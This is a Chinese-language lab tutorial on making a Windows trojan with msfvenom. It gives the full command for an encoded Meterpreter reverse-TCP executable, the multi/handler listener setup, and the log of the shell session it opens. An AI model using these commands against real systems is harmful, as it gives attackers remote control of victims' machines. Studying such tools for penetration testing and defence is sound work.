kali使用msfvenom生成木马程序

0x01 msfvenom介绍
一、移除metasploit-framework版本中的msfencoder和msfpayload,并使用msfvenom取代。
二、熟悉msfvenom生成木马程序过程,并执行和监听控制。
0x02 木马程序原理
利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
0x03 步骤详解
一、首先利用msfvenom生成一个木马程序,具体命令如下:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.43.186 LPORT=55555 -f exe > sun.exe
LHOST指Kali的本机IP,LPORT指木马程序占用的端口。
二、然后,进入msfconsole,使用handler模块,具体命令:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
这里要选用与木马程序相同的payload,并且LHOST以及LPORT也要设置相同,如下:
msf exploit(handler) > set LHOST 192.168.43.186
msf exploit(handler) > set LPORT 55555
设置好之后options可以查看设置情况,之后exploit进行监听:
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.43.186:55555
[*] Starting the payload handler...
当在物理机运行所生成的木马文件sun.exe时,会反弹一个meterpreter,如下:
[*] Sending stage (957487 bytes) to 192.168.43.197
[*] Meterpreter session 1 opened (192.168.43.186:55555 -> 192.168.43.197:11417) at 2017-01-24 20:48:06 +0800
meterpreter >
此时木马程序成功完成功能。
0x04 关于msfvenom参数问题
-p payload
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
LHOST,LPORT 监听上线的主机IP和端口
-f exe 生成EXE格式